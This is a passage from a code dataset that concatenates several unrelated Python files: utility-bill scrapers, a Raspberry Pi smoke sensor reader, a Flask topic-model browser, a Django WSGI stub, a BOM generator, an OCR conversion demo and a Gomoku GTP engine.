br.open('http://wss.mahadiscom.in/wss/wss?uiActionName=getViewPayBill')
br.select_form(name="viewPayBillForm")
br.set_all_readonly(False)
#payload = {'ConsumerNo': customerNo, 'BuNumber': locality}
br['uiActionName'] = 'getBillingDetail'
br['consumerNumber'] = customerNo
br['BU'] = locality
br['hdnConsumerNumber'] = customerNo
br['hdnBu'] = ''
br['isViaForm']=''
br['hdnBillMonth'] = ''
br['hdnDdlConsumerType'] = ''
#br['consumerType'] = '1'
text_control = br.form.find_control(id="consumerType")
for item in text_control.items:
if item.name == '1':
item.selected = True
txt = br.form.find_control(nr=12)
for item in txt.items:
if item.name == locality:
item.selected = True
cir = br.form.find_control(id='ddlCircleCode')
for item in cir.items:
if item.name == '-1':
item.selected = True
resp = br.submit()
soup = BeautifulSoup(br.response().read())
mnths = soup.find(attrs={"name": "billmnthArr"})['value']
amts = soup.find(attrs={"name": "billAmntArr"})['value']
consumps = soup.find(attrs={"name": "billConsumpArr"})['value']
mnthList = mnths.split(',')
amtList = amts.split(',')
consumList = consumps.split(',')
BillReadings=[[0,0]]
EnergyReadings=[[0,0]]
ct=0
for var in mnthList:
if(ct == 0):
try:
BillReadings[0][0] = mnthList[0]
BillReadings[0][1] = float(amtList[0])
EnergyReadings[0][0] = mnthList[0]
except:
pass
if(ct > 0):
try:
BillReadings.append([mnthList[ct], float(amtList[ct])])
EnergyReadings.append([mnthList[ct], float(consumList[ct])])
except:
pass
ct = ct + 1
Name = soup.find("label", {"id": "lblConsumerName"}).string
Address = soup.find("label", {"id": "lblAddress"}).string
obj = {u"BillReadings": BillReadings, u"EnergyReadings":EnergyReadings, u"Name": Name, u"Address": Address}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
print e.__str__()
return "error"
pass
def ScrapWBSEDCL(customerNo):
try:
br = initBrowser()
br.open('http://www.wbsedcl.in/webdynpro/dispatcher/local/LmvBilling_ZCC/LmvBillingApp')
print br.response().read()
br.select_form(nr=0)
br['MDAA.LmvBillingView.consumerIdInputField'] = customerNo
resp=br.submit()
print br.response().read()
soup = BeautifulSoup(br.response().read())
Name = soup.find("span", {"id": "MDAA.LmvBillingView.consumerName"}).string
Address = soup.find("span", {"id": "MDAA.LmvBillingView.consumerAddress"}).string
td = soup.find_all("td")
BillReadings=[[0,0]]
BillReadings[0][0] = td[19].string
BillReadings[0][1] = float(td[28].string.replace(',', ''))
br.open('http://www.bsesdelhi.com/bsesdelhi/billHistory.do?caNumber=000'+customerNo)
soup=BeautifulSoup(br.response().read())
td=soup.find_all("td")
for i in range(2, 7, 1):
temp = td[7*i].string
val = float(td[7*i+3].string.replace(',', ''))
BillReadings.append([temp,val])
obj = {u"BillReadings": BillReadings, u"Name": Name[2:], u"Address": Address[2:], u"Sanctioned Load": LoadSanctioned, u"District": District, u"Circle": Circle, u"Place Type": PlaceType}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
print e.__str__()
return "error"
pass
def ScrapTANGEDCO(customerNo, locality):
try:
br = initBrowser()
br.open('https://www.tnebnet.org/awp/account?execution=e1s1')
br.select_form(name='form')
br['form:consumerNo'] = customerNo
control = br.form.find_control("form:firstName")
for item in control.items:
if item.name == locality:
item.selected = True
resp=br.submit()
soup = BeautifulSoup(br.response().read())
tab = soup.find("table", {"class": "billtable"})
tr = tab.find_all("tr")
td0 = tr[0].find_all("td")
Name = td0[1].text
td2 = tr[2].find_all("td")
Circle = td2[1].text
td6 = tr[6].find_all("td")
Address = td6[1].text
divv = soup.find("div", {"id": "j_idt31:j_idt233"})
grid = divv.find("table", {"role": "grid"})
tds = grid.find_all("td", {"role": "gridcell"})
BillReadings=[[0,0]]
BillReadings[0][0] = tds[0].next.next.string
BillReadings[0][1] = float(tds[8].next.next.string)
for i in range(1, 6, 1):
temp = tds[14*i].next.next.string
val = float(tds[14*i+8].next.next.string)
BillReadings.append([temp,val])
obj = {u"BillReadings": BillReadings, u"Name": Name, u"Address": Address, u"Circle": Circle}
json_obj=json.dumps(obj)
br.close()
return json_obj
except Exception as e:
print e.__str__()
return "error"
pass | [
"Inderpals@iiitd.ac.in"
] | Inderpals@iiitd.ac.in |
ef27bf70b07265681e123092f152efdfa83c3506 | 91c3eed3612a651d6ba6ab0d2a45c960abec5014 | /SchubbeServer/submodules/smokeSensor.py | 44e2be4f08b63f7bc287bd7bfad977e244d3a11d | [] | no_license | Janessus/SchubbeServer | ee0fb2e5118d4ce59937a16d067ba2df0ccc9fb3 | 27bc785995a0bdb502ecafbd827f7cb455f35aeb | refs/heads/master | 2021-01-02T06:16:40.024713 | 2020-06-23T10:20:01 | 2020-06-23T10:20:01 | 239,526,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,124 | py |
import time
import board
import busio
import adafruit_ads1x15.ads1115 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
# import RPi.GPIO as gpio
def init():
# Create the I2C bus
i2c = busio.I2C(board.SCL, board.SDA)
# Create the ADC object using the I2C bus
ads = ADS.ADS1115(i2c)
# you can specify an I2C adress instead of the default 0x48
# ads = ADS.ADS1115(i2c, address=0x49)
# Create single-ended input on channel 0
chan = AnalogIn(ads, ADS.P0)
# Create differential input between channel 0 and 1
# chan = AnalogIn(ads, ADS.P0, ADS.P1)
# pin = 2
# GPIO.setmode(GPIO.BCM)
# GPIO.setup(pin, GPIO.OUT)
# GPIO.output(pin, GPIO.LOW)
return chan
def getADCValue(chan):
return chan.value
def getADCVoltage(chan):
return chan.voltage
'''
def printValues(chan):
print("{:>5}\t{:>5}".format('raw', 'v'))
while True:
print("values without formatting: " + chan.value + ", " + chan.voltage + "v")
print("{:>5}\t{:>5.3f}".format(chan.value, chan.voltage))
time.sleep(0.5)
def main():
printValues(init())
'''
| [
"janesheuberger@web.de"
] | janesheuberger@web.de |
9763acf2c3ee9ef17482c7d31f82767ad9733da0 | 415de2699e479b962579d41b2161efb07caabfe5 | /adrien/browser/egc_topic_browser.py | 65512384a96fb2ad4eeb1d75022aaba1149ca19e | [] | no_license | AdrienGuille/EGC-Cup-2016 | 15c64f4095655583bf0ef8fd18cb555cbda640bc | 198f7c8c3b5a2a788004e3359bbdbcda4acdb9c4 | refs/heads/master | 2021-01-02T23:03:00.830428 | 2015-10-25T09:45:53 | 2015-10-25T09:45:54 | 38,754,269 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,419 | py | # coding: utf-8
from nlp.topic_model import LatentDirichletAllocation, NonNegativeMatrixFactorization
from structure.corpus import Corpus
from structure.author_topic_graph import AuthorTopicGraph
import numpy as np
from scipy import stats as st
from flask import Flask, render_template
import utils
from flask.ext.frozen import Freezer
import shutil
import os
__author__ = "Adrien Guille"
__email__ = "adrien.guille@univ-lyon2.fr"
# Flask Web server
app = Flask(__name__)
freeze_browser = True
# Parameters
update_data = False
max_tf = 0.8
min_tf = 4
lemmatizer = None
num_topics = 15
vectorization = 'tfidf'
# Fit a new topic model
'''
# Load corpus
corpus = Corpus(source_file_path='../input/input_for_topic_modeling.csv',
language='french',
vectorization=vectorization,
max_relative_frequency=max_tf,
min_absolute_frequency=min_tf,
preprocessor=None)
print 'corpus size:', corpus.size
print 'vocabulary size:', len(corpus.vocabulary)
# Infer topics
topic_model = NonNegativeMatrixFactorization(corpus=corpus)
topic_model.infer_topics(num_topics=num_topics)
utils.save_topic_model(topic_model, '../nmf_15topics_egc.pickle')
topic_model.print_topics(num_words=10)
'''
# Load an existing topic model
topic_model = utils.load_topic_model('../nmf_15topics_egc.pickle')
topic_model.print_topics()
# Associate documents with topics
topic_associations = topic_model.documents_per_topic()
# Extract the list of authors
author_list = topic_model.corpus.all_authors()
if update_data:
# Clean the data directory
if os.path.exists('static/data'):
shutil.rmtree('static/data')
os.makedirs('static/data')
# Export topic cloud
utils.save_topic_cloud(topic_model, 'static/data/topic_cloud.json')
# Export details about topics
for topic_id in range(topic_model.nb_topics):
utils.save_word_distribution(topic_model.top_words(topic_id, 20),
'static/data/word_distribution'+str(topic_id)+'.tsv')
utils.save_affiliation_repartition(topic_model.affiliation_repartition(topic_id),
'static/data/affiliation_repartition'+str(topic_id)+'.tsv')
evolution = []
for i in range(2004, 2016):
evolution.append((i, topic_model.topic_frequency(topic_id, date=i)))
utils.save_topic_evolution(evolution, 'static/data/frequency'+str(topic_id)+'.tsv')
# Export details about documents
for doc_id in range(topic_model.corpus.size):
utils.save_topic_distribution(topic_model.topic_distribution_for_document(doc_id),
'static/data/topic_distribution_d'+str(doc_id)+'.tsv')
# Export details about words
for word_id in range(len(topic_model.corpus.vocabulary)):
utils.save_topic_distribution(topic_model.topic_distribution_for_word(word_id),
'static/data/topic_distribution_w'+str(word_id)+'.tsv')
# Export details about authors
for author_id in range(len(author_list)):
utils.save_topic_distribution(topic_model.topic_distribution_for_author(author_list[author_id]),
'static/data/topic_distribution_a'+str(author_id)+'.tsv')
# Export per-topic author network
for topic_id in range(topic_model.nb_topics):
utils.save_json_object(topic_model.corpus.collaboration_network(topic_associations[topic_id]),
'static/data/author_network'+str(topic_id)+'.json')
print 'Topic/corpus browser ready'
@app.route('/')
def index():
return render_template('index.html',
topic_ids=range(topic_model.nb_topics),
doc_ids=range(topic_model.corpus.size),
method=type(topic_model).__name__,
corpus_size=topic_model.corpus.size,
vocabulary_size=len(topic_model.corpus.vocabulary),
max_tf=max_tf,
min_tf=min_tf,
vectorization=vectorization,
preprocessor=type(lemmatizer).__name__,
num_topics=num_topics)
@app.route('/topic_cloud.html')
def topic_cloud():
return render_template('topic_cloud.html',
topic_ids=range(topic_model.nb_topics),
doc_ids=range(topic_model.corpus.size))
@app.route('/vocabulary.html')
def vocabulary():
word_list = []
for i in range(len(topic_model.corpus.vocabulary)):
word_list.append((i, topic_model.corpus.word_for_id(i)))
splitted_vocabulary = []
words_per_column = int(len(topic_model.corpus.vocabulary)/5)
for j in range(5):
sub_vocabulary = []
for l in range(j*words_per_column, (j+1)*words_per_column):
sub_vocabulary.append(word_list[l])
splitted_vocabulary.append(sub_vocabulary)
return render_template('vocabulary.html',
topic_ids=range(topic_model.nb_topics),
doc_ids=range(topic_model.corpus.size),
splitted_vocabulary=splitted_vocabulary,
vocabulary_size=len(word_list))
@app.route('/author_index.html')
def authors():
splitted_author_list = []
authors_per_column = int(len(author_list)/5)
for j in range(5):
sub_list = []
for l in range(j*authors_per_column, (j+1)*authors_per_column):
sub_list.append((l, author_list[l]))
splitted_author_list.append(sub_list)
return render_template('all_authors.html',
topic_ids=range(topic_model.nb_topics),
doc_ids=range(topic_model.corpus.size),
splitted_author_list=splitted_author_list,
number_of_authors=len(author_list))
@app.route('/topic/<tid>.html')
def topic_details(tid):
ids = topic_associations[int(tid)]
documents = []
for document_id in ids:
document_author_id = []
for author_name in topic_model.corpus.authors(document_id):
document_author_id.append((author_list.index(author_name), author_name))
documents.append((topic_model.corpus.short_content(document_id).capitalize(),
document_author_id,
topic_model.corpus.date(document_id), document_id))
return render_template('topic.html',
topic_id=tid,
frequency=round(topic_model.topic_frequency(int(tid))*100, 2),
documents=documents,
topic_ids=range(topic_model.nb_topics),
doc_ids=range(topic_model.corpus.size))
@app.route('/document/<did>.html')
def document_details(did):
vector = topic_model.corpus.vector_for_document(int(did))
word_list = []
for a_word_id in range(len(vector)):
word_list.append((topic_model.corpus.word_for_id(a_word_id), round(vector[a_word_id], 3), a_word_id))
word_list.sort(key=lambda x: x[1])
word_list.reverse()
nb_words = 20
documents = []
for another_doc in topic_model.corpus.similar_documents(int(did), 5):
document_author_id = []
for author_name in topic_model.corpus.authors(another_doc[0]):
document_author_id.append((author_list.index(author_name), author_name))
documents.append((topic_model.corpus.short_content(another_doc[0]).capitalize(),
document_author_id,
topic_model.corpus.date(another_doc[0]), another_doc[0], round(another_doc[1], 3)))
return render_template('document.html',
doc_id=did,
words=word_list[:nb_words],
topic_ids=range(topic_model.nb_topics),
doc_ids=range(topic_model.corpus.size),
documents=documents,
authors=', '.join(topic_model.corpus.authors(int(did))),
year=topic_model.corpus.date(int(did)),
short_content=topic_model.corpus.short_content(int(did)),
article_id=topic_model.corpus.data_frame.iloc[int(did)]['url'])
@app.route('/word/<wid>.html')
def word_details(wid):
documents = []
for document_id in topic_model.corpus.docs_for_word(int(wid)):
document_author_id = []
for author_name in topic_model.corpus.authors(document_id):
document_author_id.append((author_list.index(author_name), author_name))
documents.append((topic_model.corpus.short_content(document_id).capitalize(),
document_author_id,
topic_model.corpus.date(document_id), document_id))
return render_template('word.html',
word_id=wid,
word=topic_model.corpus.word_for_id(int(wid)),
topic_ids=range(topic_model.nb_topics),
doc_ids=range(topic_model.corpus.size),
documents=documents)
@app.route('/author/<aid>.html')
def author_details(aid):
documents = []
for document_id in topic_model.corpus.documents_by_author(author_list[int(aid)]):
document_author_id = []
for author_name in topic_model.corpus.authors(document_id):
document_author_id.append((author_list.index(author_name), author_name))
documents.append((topic_model.corpus.short_content(document_id).capitalize(),
document_author_id,
topic_model.corpus.date(document_id), document_id))
repartition = np.array(topic_model.topic_distribution_for_author(author_list[int(aid)]))
skewness = float(st.skew(repartition, axis=0))
return render_template('author.html',
author_name=author_list[int(aid)],
author_id=str(int(aid)),
affiliations='',
topic_ids=range(topic_model.nb_topics),
doc_ids=range(topic_model.corpus.size),
documents=documents,
skewness=round(skewness, 3))
if __name__ == '__main__':
if freeze_browser:
app.config.update(
FREEZER_BASE_URL='http://mediamining.univ-lyon2.fr/people/guille/egc2016/',
)
freezer = Freezer(app)
@freezer.register_generator
def topic_details():
for topic_id in range(topic_model.nb_topics):
yield {'tid': topic_id}
@freezer.register_generator
def document_details():
for doc_id in range(topic_model.corpus.size):
yield {'did': doc_id}
@freezer.register_generator
def word_details():
for word_id in range(len(topic_model.corpus.vocabulary)):
yield {'wid': word_id}
@freezer.register_generator
def author_details():
for author_id in range(len(author_list)):
yield {'aid': author_id}
freezer.freeze()
else:
# Load corpus
app.run(debug=True, host='localhost', port=2016)
| [
"adrien.guille@gmail.com"
] | adrien.guille@gmail.com |
2d15ec2b8d64cbb34b07779dbf0de9ce79ece52e | d3f9b18dccba61c88aab4e1d1d73dc96c1b87094 | /Python/CodingDojo_Python/Django/log_reg_projs/Main3/MAIN/MAIN/wsgi.py | c705725265194d75f294281d91cd40cec3a68ba7 | [] | no_license | sambragge/DojoAssignments | fc13cbccb79a71427f09e4f960ba6a664e8be408 | 6de385bc6b0bb9c0ae70c5750c9044a0668a17c9 | refs/heads/master | 2021-06-21T05:21:10.068026 | 2017-05-07T18:32:47 | 2017-05-07T18:32:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 386 | py | """
WSGI config for MAIN project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "MAIN.settings")
application = get_wsgi_application()
| [
"sam@Samuels-MacBook-Pro.local"
] | sam@Samuels-MacBook-Pro.local |
59ab3b8c00e340f686e72893e1533b2c4bc80c26 | 14ec9fc9aee69d54701168c069df4fe46a27b811 | /makeDigikeyBOM.py | 67fa76a4e374de9b7f2442ed9f00517b1d4886b5 | [] | no_license | BitKnitting/MakeDigikeyBOM | 1af6e79b9c9bb86590425ec06bbacc63fa2cbb60 | ef12a92dec3abbd86571b40d6ea7ea72fa6e60b1 | refs/heads/master | 2021-01-13T00:59:15.063713 | 2017-02-20T18:30:42 | 2017-02-20T18:30:42 | 53,728,672 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | #
# The main entry point to making a digikey Bom CSV file from the output of bom2csv
# as discussed in the bitknitting blog post: https://bitknitting.wordpress.com/2016/03/05/from-kicad-to-digikey-generating-a-bom-based-on-esteem-overview/
#
import logging
logger = logging.getLogger(__name__)
from replaceJellyBeanParts import replaceJellyBeanParts
from makeDigikeyFile import makeDigikeyFile
from getParts import getParts
def makeDigikeyBOM(outputFrom_bom2csv,jellyBeanFile,outDir,numProcesses):
modifiedBOM2csvFile = replaceJellyBeanParts(outputFrom_bom2csv=outputFrom_bom2csv,jellyBeanFile=jellyBeanFile)
components_by_part_number = getParts(modifiedBOM2csvFile=modifiedBOM2csvFile)
if not makeDigikeyFile(components_by_part_number,outDir):
logger.error("Could not make the Digikey file. Check output from logger.") | [
"farmerrobbie@freshsalad.today"
] | farmerrobbie@freshsalad.today |
506914e27072e3732420f2074b84705988b980b3 | 619e18c1006f2e9e8960e800edb0490131b1ca35 | /poc.py | e13810b86de3fa773f4376551d4f7fc3575b42ba | [
"Apache-2.0"
] | permissive | Gibstick/hocr-to-zuvaocr-converter | 4c0b61e39d5f420a2185c34aee81c4f9a50b0c7d | b7eafed23a00efd1ee6caa748e2fdb7788aed914 | refs/heads/main | 2023-08-22T21:02:15.739377 | 2021-10-07T13:44:46 | 2021-10-07T13:44:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,690 | py | # Copyright 2021 Zuva Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This proof of concept uses the ZDAI Python Wrapper found below:
# https://github.com/zuvaai/zdai-python
# Comment out lines 22 and 65-onwards if you wish to skip it.
import hashlib
from HOCRToZuvaOCRConverter import HOCRToZuvaOCRConverter
from zdai import ZDAISDK, Language, Classification, Extraction
from datetime import datetime
import time
import os
from colorama import Fore
hocr_folder = 'out/CANADAGOOS-F1Securiti-2152017/'
zuva_ocr_file = 'CANADAGOOS-F1Securiti-2152017.zuvaocr'
source_file = 'CANADAGOOS-F1Securiti-2152017.PDF'
def consoleout(msg):
print(f'[{datetime.now()}] {msg}')
def delete_zuvaocr():
try:
os.remove(zuva_ocr_file)
print(f'Deleted {zuva_ocr_file}')
except OSError:
pass
def get_source_file_md5():
with open(source_file, 'rb') as source:
lines = source.read()
hash = hashlib.md5(lines)
return hash
delete_zuvaocr()
converter = HOCRToZuvaOCRConverter()
converter.hocr_folder = hocr_folder
md5 = get_source_file_md5()
converter.set_document_md5(md5.digest())
consoleout(f'Starting conversion')
converter.start()
converter.export(zuva_ocr_file)
consoleout(f'Conversion done and saved to {zuva_ocr_file}')
# Everything below is dependent on the ZDAI Python Wrapper
field_names_to_extract = ['Title', 'Parties', 'Date', 'Governing Law', 'Indemnity']
sdk = ZDAISDK(from_config = True)
fields, _ = sdk.fields.get()
field_ids = [f.id for f in fields if f.name in field_names_to_extract]
consoleout(f'Obtained field_ids for extraction: {", ".join(field_names_to_extract)}')
# Uncomment the below !
with open(zuva_ocr_file, 'rb') as zuvaocr:
file, _ = sdk.file.create(content = zuvaocr.read(), is_zuva_ocr = True)
consoleout(f'Submitted {zuva_ocr_file} as {file.id}. It expires on {file.expiration}.')
jobs = []
jobs.extend(sdk.classification.create(file_ids = [file.id])[0]) # Uncomment this!
jobs.extend(sdk.language.create(file_ids = [file.id])[0]) # Uncomment this!
jobs.extend(sdk.extraction.create(file_ids = [file.id], field_ids = field_ids)[0])
for job in jobs:
consoleout(Fore.BLUE + f'{type(job).__name__}' + Fore.RESET + f' Request ID ' +
Fore.BLUE + job.request_id + Fore.RESET)
consoleout(f'Waiting for requests to complete')
# Wait for the requests to complete
while len(jobs)>0:
for job in jobs:
if isinstance(job, Language):
_latest, _ = sdk.language.get(request_id = job.request_id)
if not _latest.is_done(): continue
if _latest.status == 'failed':
consoleout(Fore.RED + f'!!! {_latest.request_id} failed !!!' + Fore.RESET)
consoleout(_latest.json())
jobs.remove(job)
continue
consoleout(Fore.BLUE + f'Language' + Fore.RESET + f' {_latest.language}')
jobs.remove(job)
elif isinstance(job, Classification):
_latest, _ = sdk.classification.get(request_id = job.request_id)
if not _latest.is_done(): continue
if _latest.status == 'failed':
consoleout(Fore.RED + f'!!! {_latest.request_id} failed !!!' + Fore.RESET)
consoleout(_latest.json())
jobs.remove(job)
continue
is_contract = 'Yes' if _latest.is_contract else 'No'
consoleout(Fore.BLUE + f'Classification' + Fore.RESET + f' {_latest.classification}')
consoleout(Fore.BLUE + f'Is it a Contract? ' + Fore.RESET + is_contract)
jobs.remove(job)
elif isinstance(job, Extraction):
_latest, _ = sdk.extraction.get(request_id = job.request_id)
if not _latest.is_done(): continue
if _latest.status == 'failed':
consoleout(Fore.RED + f'!!! {_latest.request_id} failed !!!' + Fore.RESET)
consoleout(_latest.json())
jobs.remove(job)
continue
extraction, _ = sdk.extraction.get_result(request_id = job.request_id)
for field in extraction.fields:
if len(field.extractions)>0:
field_name = [f.name for f in fields if f.id == field.field_id][0]
for field_extraction in field.extractions:
# This contains an ExtractionResult: the text & the spans.
# We need to use the spans to figure out the bounding boxes from
# the list of Zuva Characters (which come from the converter)
# Note that the spans property is an array of starts and ends,
# So we need to iterate through those to grab their indices.
print(f'{field_name}: {field_extraction.text}')
for span in field_extraction.spans:
zuva_characters = converter.get_zuvaocr_characters_by_range(start = span.get('start'),
end = span.get('end'))
# Go through the range of this span to grab the Zuva Characters
for i in range(span.get('start'), span.get('end')):
zuva_character = converter.zuva_document.characters[i]
zuva_page = converter.get_zuvaocr_page_by_character_position(i) + 1 # 0-based indices
print(f' [Field \"{field_name}\"] '
f'[Page: {zuva_page}] '
f'[Character: \"{chr(zuva_character.unicode)}\"] '
f'[BoundingBox: '
f'x1={zuva_character.bounding_box.x1}, '
f'y1={zuva_character.bounding_box.y1}, '
f'x2={zuva_character.bounding_box.x2}, '
f'y2={zuva_character.bounding_box.y2}] '
)
jobs.remove(job)
time.sleep(2) | [
"francois.longtin@kirasystems.com"
] | francois.longtin@kirasystems.com |
8143df4cf84b31a4228183b1bc7cc7da429e74d9 | f01c1f5a6f3a9377bc83be0e8cfe29ac59272378 | /cmput496/assignment3/gtp_connection.py | 28453102f55576df1d63875016492d0412efaefa | [] | no_license | boweiww/Projects | 528d01205565ebb7f0c84f28d840eecf4e329274 | 5e0375a17fc97f623557ca6a2b1d20ebd360664f | refs/heads/master | 2021-10-24T09:50:20.539585 | 2019-03-24T22:34:26 | 2019-03-24T22:34:26 | 113,407,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,139 | py | """
gtp_connection.py
Module for playing games of Go using GoTextProtocol
Parts of this code were originally based on the gtp module
in the Deep-Go project by Isaac Henrion and Amos Storkey
at the University of Edinburgh.
"""
import traceback
from sys import stdin, stdout, stderr
from board_util import GoBoardUtil, BLACK, WHITE, EMPTY, BORDER, PASS, \
MAXSIZE, coord_to_point
import numpy as np
import re
class GtpConnection():
def __init__(self, go_engine, board, debug_mode = False):
"""
Manage a GTP connection for a Go-playing engine
Parameters
----------
go_engine:
a program that can reply to a set of GTP commandsbelow
board:
Represents the current board state.
"""
self._debug_mode = debug_mode
self.go_engine = go_engine
self.board = board
self.commands = {
"protocol_version": self.protocol_version_cmd,
"quit": self.quit_cmd,
"name": self.name_cmd,
"boardsize": self.boardsize_cmd,
"showboard": self.showboard_cmd,
"clear_board": self.clear_board_cmd,
"komi": self.komi_cmd,
"version": self.version_cmd,
"known_command": self.known_command_cmd,
"genmove": self.genmove_cmd,
"list_commands": self.list_commands_cmd,
"play": self.play_cmd,
"legal_moves": self.legal_moves_cmd,
"gogui-rules_game_id": self.gogui_rules_game_id_cmd,
"gogui-rules_board_size": self.gogui_rules_board_size_cmd,
"gogui-rules_legal_moves": self.gogui_rules_legal_moves_cmd,
"gogui-rules_side_to_move": self.gogui_rules_side_to_move_cmd,
"gogui-rules_board": self.gogui_rules_board_cmd,
"gogui-rules_final_result": self.gogui_rules_final_result_cmd,
"gogui-analyze_commands": self.gogui_analyze_cmd,
"policy": self.policy_cmd,
"policy_moves": self.policy_moves_cmd,
}
# used for argument checking
# values: (required number of arguments,
# error message on argnum failure)
self.argmap = {
"boardsize": (1, 'Usage: boardsize INT'),
"komi": (1, 'Usage: komi FLOAT'),
"known_command": (1, 'Usage: known_command CMD_NAME'),
"genmove": (1, 'Usage: genmove {w,b}'),
"play": (2, 'Usage: play {b,w} MOVE'),
"legal_moves": (1, 'Usage: legal_moves {w,b}'),
"policy": (1, "Usage: policy policytype")
}
def write(self, data):
stdout.write(data)
def flush(self):
stdout.flush()
def start_connection(self):
"""
Start a GTP connection.
This function continuously monitors standard input for commands.
"""
line = stdin.readline()
while line:
self.get_cmd(line)
line = stdin.readline()
def get_cmd(self, command):
"""
Parse command string and execute it
"""
if len(command.strip(' \r\t')) == 0:
return
if command[0] == '#':
return
# Strip leading numbers from regression tests
if command[0].isdigit():
command = re.sub("^\d+", "", command).lstrip()
elements = command.split()
if not elements:
return
command_name = elements[0]; args = elements[1:]
if self.has_arg_error(command_name, len(args)):
return
if command_name in self.commands:
try:
self.commands[command_name](args)
except Exception as e:
self.debug_msg("Error executing command {}\n".format(str(e)))
self.debug_msg("Stack Trace:\n{}\n".
format(traceback.format_exc()))
raise e
else:
self.debug_msg("Unknown command: {}\n".format(command_name))
self.error('Unknown command')
stdout.flush()
def has_arg_error(self, cmd, argnum):
"""
Verify the number of arguments of cmd.
argnum is the number of parsed arguments
"""
if cmd in self.argmap and self.argmap[cmd][0] != argnum:
self.error(self.argmap[cmd][1])
return True
return False
def debug_msg(self, msg):
""" Write msg to the debug stream """
if self._debug_mode:
stderr.write(msg)
stderr.flush()
def error(self, error_msg):
""" Send error msg to stdout """
stdout.write('? {}\n\n'.format(error_msg))
stdout.flush()
def respond(self, response=''):
""" Send response to stdout """
stdout.write('= {}\n\n'.format(response))
stdout.flush()
def reset(self, size):
"""
Reset the board to empty board of given size
"""
self.board.reset(size)
def board2d(self):
return str(GoBoardUtil.get_twoD_board(self.board))
def protocol_version_cmd(self, args):
""" Return the GTP protocol version being used (always 2) """
self.respond('2')
"""The code is added at here"""
def policy_cmd(self,args):
if args[0] != 'random' and args[0] != 'rule_based':
self.respond("illegal policy: {}".format(args[0]))
else:
self.policy = args[0]
self.respond()
def policy_moves_cmd(self,args):
if self.policy == 'random':
MoveType,position = self.go_engine.random(self.board)
else:
MoveType,position = self.go_engine.RuleBased(self.board)
if position == PASS:
self.respond()
return
moves = []
for i in range(len(position)):
move_coord = point_to_coord(position[i], self.board.size)
move_as_string = format_point(move_coord)
moves.append(move_as_string)
moves.sort()
movestr = " ".join(str(move) for move in moves)
self.respond("{} {}".format(MoveType,movestr))
# else:
# self.respond("illegal move: {}".format(move_as_string))
"""code end"""
def quit_cmd(self, args):
""" Quit game and exit the GTP interface """
self.respond()
exit()
def name_cmd(self, args):
""" Return the name of the Go engine """
self.respond(self.go_engine.name)
def version_cmd(self, args):
""" Return the version of the Go engine """
self.respond(self.go_engine.version)
def clear_board_cmd(self, args):
""" clear the board """
self.reset(self.board.size)
self.respond()
def boardsize_cmd(self, args):
"""
Reset the game with new boardsize args[0]
"""
self.reset(int(args[0]))
self.respond()
def showboard_cmd(self, args):
self.respond('\n' + self.board2d())
def komi_cmd(self, args):
"""
Set the engine's komi to args[0]
"""
self.go_engine.komi = float(args[0])
self.respond()
def known_command_cmd(self, args):
"""
Check if command args[0] is known to the GTP interface
"""
if args[0] in self.commands:
self.respond("true")
else:
self.respond("false")
def list_commands_cmd(self, args):
""" list all supported GTP commands """
self.respond(' '.join(list(self.commands.keys())))
def legal_moves_cmd(self, args):
"""
List legal moves for color args[0] in {'b','w'}
"""
board_color = args[0].lower()
color = color_to_int(board_color)
moves = GoBoardUtil.generate_legal_moves(self.board, color)
gtp_moves = []
for move in moves:
coords = point_to_coord(move, self.board.size)
gtp_moves.append(format_point(coords))
sorted_moves = ' '.join(sorted(gtp_moves))
self.respond(sorted_moves)
def play_cmd(self, args):
"""
play a move args[1] for given color args[0] in {'b','w'}
"""
try:
board_color = args[0].lower()
board_move = args[1]
if board_color != "b" and board_color !="w":
self.respond("illegal move: \"{}\" wrong color".format(board_color))
return
color = color_to_int(board_color)
if args[1].lower() == 'pass':
self.board.play_move(PASS, color)
self.board.current_player = GoBoardUtil.opponent(color)
self.respond()
return
coord = move_to_coord(args[1], self.board.size)
if coord:
move = coord_to_point(coord[0],coord[1], self.board.size)
else:
self.error("Error executing move {} converted from {}"
.format(move, args[1]))
return
if not self.board.play_move_gomoku(move, color):
self.respond("illegal move: \"{}\" occupied".format(board_move))
return
else:
self.debug_msg("Move: {}\nBoard:\n{}\n".
format(board_move, self.board2d()))
self.respond()
except Exception as e:
self.respond('{}'.format(str(e)))
def genmove_cmd(self, args):
"""
Generate a move for the color args[0] in {'b', 'w'}, for the game of gomoku.
"""
board_color = args[0].lower()
color = color_to_int(board_color)
game_end, winner = self.board.check_game_end_gomoku()
if game_end:
if winner == color or winner == EMPTY:
self.respond("pass")
else:
self.respond("resign")
return
_,position = self.go_engine.RuleBased(self.board)
if position == PASS:
self.respond("pass")
return
move = position[0]
move_coord = point_to_coord(move, self.board.size)
move_as_string = format_point(move_coord)
if self.board.is_legal_gomoku(move, color):
self.board.play_move_gomoku(move, color)
self.respond(move_as_string)
else:
self.respond("illegal move: {}".format(move_as_string))
def gogui_rules_game_id_cmd(self, args):
self.respond("Gomoku")
def gogui_rules_board_size_cmd(self, args):
self.respond(str(self.board.size))
def legal_moves_cmd(self, args):
"""
List legal moves for color args[0] in {'b','w'}
"""
board_color = args[0].lower()
color = color_to_int(board_color)
moves = GoBoardUtil.generate_legal_moves(self.board, color)
gtp_moves = []
for move in moves:
coords = point_to_coord(move, self.board.size)
gtp_moves.append(format_point(coords))
sorted_moves = ' '.join(sorted(gtp_moves))
self.respond(sorted_moves)
